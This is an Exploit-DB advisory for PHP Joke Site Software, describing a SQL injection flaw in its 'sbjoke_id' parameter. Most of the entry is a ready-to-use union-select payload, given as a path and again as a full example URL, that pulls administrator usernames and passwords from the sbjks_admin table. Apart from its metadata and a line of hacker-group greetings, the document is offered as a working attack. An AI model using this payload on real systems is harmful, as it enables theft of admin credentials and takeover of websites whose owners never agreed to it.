PHP Joke Site Software - 'sbjoke_id' SQL Injection

EDB-ID:

14860

CVE:

N/A


Author:

h4ck3r

Type:

webapps


Platform:

PHP

Date:

2010-09-01


[#] Title:    PHP Joke Site Software (sbjoke_id) SQL Injection Vuln

[#] Link:    http://www.softbizscripts.com/jokes-script-features.php

[#] Author:    BorN To K!LL - h4ck3r

[#] 3xploit:

/index.php?sbjoke_id=-5592+union+all+select+1,2,3,4,concat(sbadmin_name,0x3a,sbadmin_pwd),6,7,8,9,10,11,12,13+from+sbjks_admin--

[#] 3xample:

http://www.site.com/index.php?sbjoke_id=-5592+union+all+select+1,2,3,4,concat(sbadmin_name,0x3a,sbadmin_pwd),6,7,8,9,10,11,12,13+from+sbjks_admin--

[#] Greetings:

[Dr.2] , [darkc0de team] , [AsbMay's Group] , n all ...